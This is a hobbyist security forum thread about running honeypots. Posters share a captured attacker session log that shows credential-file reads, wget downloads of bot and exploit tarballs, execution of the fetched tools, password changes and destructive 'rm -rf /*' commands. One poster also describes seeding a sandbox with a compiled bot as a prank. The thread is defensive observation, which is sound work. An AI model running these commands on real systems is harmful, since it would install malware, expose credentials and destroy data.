My Honey

[farmer6re9]

Hi Y'all

I'm just curious if anyone out there actually runs a honeypot for pure amusement. I'm a bit of a freaky geek and do enjoy antagonizing botnets in my spare time just to see what's going on out there. And of course there are a few occassions when a real live goon pokes at my IP and the wire gets a little more heated up.

I don't face the same challenges as those of you who actually get paid to manage huge networks of machines. I am just an enthusiastic hobbiest with a half dozen or so vanilla boxes, with a few of the more common services open to the WAN. I thought it might be interesting to share a few experiences about what's running around in your subnets.

Bit Inquisitive

[Soda_Popinsky]

Oh hell yeah... here's the most activity from an attacker I've ever had... This is from a search engine honeynet. I love it when they revert to windows commands (dir... etc) when things break down. The other things like "Target in URL" and "No Referrer" are signatures that appear from different types of requests.

"2006-02-11 22:28:29";"Target in URL;"
"2006-02-11 22:28:36";"cat /etc/passwd;"
"2006-02-16 17:18:26";"Target in URL;"
"2006-02-16 17:18:28";"w;"
"2006-02-16 17:18:33";"ps x;"
"2006-02-16 17:18:36";"uname a;"
"2006-02-16 17:18:39";"ls a;"
"2006-02-16 17:18:43";"dir a;"
"2006-02-16 17:18:46";"wget;"
"2006-02-16 17:18:58";"wget xxx/bot/bot.tgz;"
"2006-02-16 17:19:14";"tar zxvf bot.tgz;rm rf bot.tgz;"
"2006-02-16 17:19:17";"ls a;"
"2006-02-16 17:19:20";"ls;"
"2006-02-16 17:19:28";"cd bot;ls;"
"2006-02-16 17:19:34";"reboot;"
"2006-02-18 20:34:20";"Target in URL;"
"2006-02-18 20:34:22";"w;"
"2006-02-18 20:34:25";"ps x;"
"2006-02-18 20:34:27";"ls a;"
"2006-02-18 20:34:30";"dir a;"
"2006-02-18 20:34:38";"cd /dev/shm;dir;"
"2006-02-18 20:34:40";"cd /dev/shm;ls;"
"2006-02-19 19:20:57";"w;"
"2006-02-19 19:20:55";"Target in URL;"
"2006-02-21 18:32:43";"No Referer;"
"2006-02-21 18:32:44";"w;"
"2006-02-21 18:32:52";"ls a;"
"2006-02-21 18:32:55";"ls a;"
"2006-02-21 23:02:19";"No Referer;"
"2006-02-22 21:21:23";"No Referer;"
"2006-02-22 21:21:25";"w;"
"2006-02-22 21:21:28";"wget;"
"2006-02-22 21:21:30";"ls -a;"
"2006-02-22 21:21:34";"dir -la;"
"2006-02-22 21:21:38";"dir -la;"
"2006-02-22 21:21:40";"dir -a;"
"2006-02-22 21:21:59";"rm -rf /* &>/dev/null && kill -9 0;"
"2006-02-25 15:48:28";"No Referer;"
"2006-02-25 15:48:30";"w;"
"2006-02-25 15:48:36";";"
"2006-02-25 15:48:38";"ls -a;"
"2006-02-25 15:48:41";"wget;"
"2006-02-26 18:43:39";"No Referer;"
"2006-02-26 18:43:46";"cat /etc/passwd;"
"2006-02-28 17:28:37";"No Referer;"
"2006-02-28 17:28:42";"w;"
"2006-02-28 17:28:54";"No Referer;"
"2006-02-28 17:28:55";"w;"
"2006-03-02 21:58:09";"No Referer;"
"2006-03-02 21:59:34";"wget http://xxx/ps/expl/ex.tgz;"
"2006-03-02 21:59:37";";"
"2006-03-02 21:59:40";"w;"
"2006-03-02 21:59:45";"ls -a;"
"2006-03-02 21:59:50";"tar zxvf ex.tgz;"
"2006-03-02 22:02:01";"cd ex/toolz;ls -a;"
"2006-03-02 22:02:04";"cd ex/toolz;dir -a;"
"2006-03-02 22:02:10";"cd ex/toolz;./8081;"
"2006-03-05 10:48:02";"No Referer;"
"2006-03-05 10:48:04";"w;"
"2006-03-05 10:52:36";"No Referer;"
"2006-03-05 10:52:38";"w;"
"2006-03-07 17:06:34";"No Referer;"
"2006-03-07 17:06:37";"w;"
"2006-03-07 17:06:40";"ps x;"
"2006-03-07 17:06:42";"ls -a;"
"2006-03-07 17:06:45";"dir -a;"
"2006-03-07 17:06:48";"dir -a;"
"2006-03-07 17:06:53";"cd /dev/shm;dir -a;"
"2006-03-07 17:07:20";"No Referer;"
"2006-03-11 22:10:11";"No Referer;"
"2006-03-11 22:10:13";"w;"
"2006-03-13 22:31:38";"No Referer;"
"2006-03-13 22:31:39";"w;"
"2006-03-13 22:31:43";"wget;"
"2006-03-13 22:31:46";"w;"
"2006-03-13 22:31:58";"passwd;"
"2006-03-13 22:32:01";"ls -a;"
"2006-03-13 22:32:39";"w;"
"2006-03-13 22:33:03";"uid;"
"2006-03-13 22:33:06";"id;"
"2006-03-13 22:35:32";"/sbin/ifconfig |grep inet;"
"2006-03-13 22:35:36";"/sbin/ifconfig |grep inet;"
"2006-03-13 22:35:39";"cat /etc/hosts;"
"2006-03-13 22:35:49";"hostnames;"
"2006-03-13 22:35:52";"hostname;"
"2006-03-13 22:35:55";"wget;"
"2006-03-13 22:36:06";"wget http://xxx/ps/bot/fast.tgz;"
"2006-03-13 22:36:20";"wget http://xxx/ps/psy/linux.tgz;"
"2006-03-13 22:36:49";"wget ps.toyoo.be/ps/linux/ex.tgz;"
"2006-03-13 22:36:58";"tar zxvf ex.tgz;rm -rf ex.tgz;"
"2006-03-13 22:37:02";"dir -a;"
"2006-03-13 22:37:04";"ls -a;"
"2006-03-13 22:37:11";"ls -alF;"
"2006-03-13 22:37:27";"cd ex/toolz;./8081;"
"2006-03-13 22:37:44";"wget xxx/ps/psy/linux.tgz;"
"2006-03-13 22:37:51";"tar zxvf linux.tgz;"
"2006-03-13 22:38:04";"cd linux;PATH="." CROND;"
"2006-03-13 22:39:39";"passwd root:root;"
"2006-03-13 22:39:46";"passwd root;root;"
"2006-03-13 22:40:14";"ls -alF;"
"2006-03-13 22:40:27";"No Referer;"
"2006-03-13 22:41:14";"ls -la;"
"2006-03-13 22:41:18";"dir -alF;"
"2006-03-13 22:41:22";"ls a;"
"2006-03-13 22:41:25";"ls;"
"2006-03-13 22:41:28";"dir;"
"2006-03-13 22:49:07";"cd /var/tmp;ls -a;"
"2006-03-13 22:49:15";"cd /var/tmp;ls -alF;"
"2006-03-13 22:49:22";"pwd;"
"2006-03-13 22:49:38";"cd /dev/shm;ls -alf;"
"2006-03-13 22:49:47";"cd /usr;ls -a;"
"2006-03-13 22:49:50";"cd /usr;ls;"
"2006-03-13 22:49:59";"reboot;"
"2006-03-13 22:50:02";"ps x;"
"2006-03-13 22:50:06";"ps -aux;"
"2006-03-13 22:52:55";"w;"
"2006-03-13 22:54:24";"uname -a;"
"2006-03-13 22:55:10";"cat /etc/issue;"
"2006-03-13 22:55:37";"ls -a;"
"2006-03-13 22:55:41";"ls -alf;"
"2006-03-13 22:56:15";"cat /etc/passwd;"
"2006-03-13 23:02:15";"passwd;"
"2006-03-18 22:50:05";"Target in URL;"
"2006-03-18 22:50:07";"w;"
"2006-03-18 22:50:14";"psx;"
"2006-03-18 22:50:16";"ps x;"
"2006-04-02 10:00:06";"No Referer;"
"2006-04-02 10:00:09";"w;"
"2006-04-02 10:00:12";"ls -a;"
"2006-04-02 10:00:14";"ps x;"
"2006-04-02 10:00:18";"w;"
"2006-04-12 23:00:00";"No Referer;"
"2006-04-12 23:00:04";"w;"
"2006-04-12 23:00:09";"ls -a;"
"2006-04-12 23:00:13";"dir -a;"
"2006-04-12 23:00:18";"rm -rf /*;"
"2006-04-12 23:00:21";"ps x;"
"2006-04-12 23:00:25";"ps -aux;"

[farmer6re9]

I see I'm not in the same league as you Soda_Popinski. I don't have the balls of steel necessary to grant a shell even if it is a false one. My amusement since July 2005 has been primarily through Samba on the WAN and a few netcat listeners on whatever ports are in vogue on a given day. Did I say I don't grant a shell, Oops I guess I do but it is severly restricted with some creative netfilters.

I am amazed at how many machines are still infected with old stuff and actively scanning subnets for new victims. I study their behavior in the hope of learning what responses quiet them down, and what excites them and attracts others from outside the subnet. My subnet (69.63) gets real busy sometimes. One host in particular which calls itself Eastdell Warehouse is always present and spewing NBSTAT's. Ettercap says it's close to a Win98SE and another neat tool shows it's listening on vnc and vnc-http. If my Samba answers these NBSTAT's, the botnet gets excited.

Are you or is anyone else familiar with what is utilizing NBSTAT probes and listens on TCP ports 5800 and 5900? Is this host a scout for the botnet? And if anyone out there manages an ISP, please tell us why such a thing is allowed to persist.

Curious like a NetCat

[skiddieleet]

Originally posted here by Soda_Popinsky
Oh hell yeah... here's the most activity from an attacker I've ever had... This is from a search engine honeynet. I love it when they revert to windows commands (dir... etc) when things break down. The other things like "Target in URL" and "No Referrer" are signatures that appear from different types of requests.

I see you cleansed the logs :P. Do you ever try downloading their tools to take a peek at them. I was going through my webserver logs the other day and tried to download tools people were trying to get through exploits. Only 3 of them were still existent. It was still fun though.

[Soda_Popinsky]

Yeah, we get a lot of IRC tools, a lot of rootkits, DoS tools, web based backdoors... you name it...

This appears a lot in many flavors
http://www.google.com/search?hl=en&q...=Google+Search

We even got some credit card validation tools.

[stanger]

i'm currently running nepenthes and honyed (using a german dialin connection )
nepenthes expects DCOM and submits new "stuff" to normans sandbox
honeyd is simulating ' MS Exchange Server ' on some ports
both are logging to a blowcrypted IRCchannel ...
thus if youre bored ... you may have fun with downloaded malwares
..or...
maximum amusement on catching "botnet trackers"
peeps are waiting at norman to grab ..ehm ... steal some poorly configured and/or compiled bots
all you need is a ircbot src code , a place where the bots would join ,...
compile your malware , submit to norman and just wait on the #chan you hardcoded in your bot
never thought about ... but i promise 'real fun'
really real fun when two 'visitors' are online same time .....

[farmer6re9]

Like I said, pure amusement. We have to restrain ourselves from becoming part of the problem. I limit my educationally lucrative playtime to layers 3 and 4 (though that Netfiler L7 patch looks interesting). Specific bots behave in specific ways, they exhibit a signiture-like pattern over time which is easily graphed for a GUI look-n-feel.

A firewall(s) can be constructed to utilize the information generated betwix this pattern's rhythm and thus incorporate a set of volume controls. How do we feel the WAN? Do we want more bass or treble today? Are we more base or trouble today? I enjoy listening to low beats as opposed to high pitched screaming, that is annoying. Through careful use of the many targets one can respond with, intuitive timing and a few other criteria, one can actually influence the rhythm and usually without climbing much higher up the stack than L4. And this can be shown with pretty images too!

Personally I never tried initiating any gets for that which is offered by any bots or otherwise. I let them put things from time to time but I never botHERD to see what happens with execution; primarily because I ain't got won of them machines you needs to Do'S it wit'. My machines mind their own business. However, when anyone comes knocking, I have the potentially amusing opportunity of answering the door and inviting them in for tea or coffee. Chrootin' the Chit Can be good clean fun I'll not DENY that. But if I don't like the conversation or it looks like you're casing my home, y'all might get asked to leave or feel a door slam on y'ass without so much as a goodbye.

I just seen an NBSTAT calling itself FAMILY and I'm reminded of this holiday weekend. I urge you good folks out there to remember and rejoyce in the SHe from which you we're bourne, you're mothers!

Composed to good low beats from Limp Bizkit - New Old Songs CD track 16 My Way - Pistols' Dancehall Dub Remixed by THE DUB PISTOLS

[stanger]

ehm...farmer ...your a crzy guy
i paid for having fun don't ya`?
do you care about ?
und falls es missverständnisse gibt (der rest in deutsch)
ich habe ein paar logs die mich noch in jahren zum lachen bringen werden
ich weiss nicht ob es sinnvoll ist diese zu posten
aber nicht eine drone kam mit vernünftigen parametern
auch nicht die von *.umich.edu

[farmer6re9]

ehm...farmer ...your a crzy guy

200

i paid for having fun don't ya`?

402

do you care about ?

405

Frank Zappa - Joe's Garage - The Central Scrutinizer - "...The white zone is for loading and unloading only. If you have to load or unload, go to the white zone. You'll love it, it's a way of life..." IE telefunkin' U47.

[hogfly]

I'm in the same boat as Soda. I've been running a research honeynet for a few years now and have collected upwards to 50 tools at a time. I collect more logs than anyone should ever have to sift through..oh the humanity.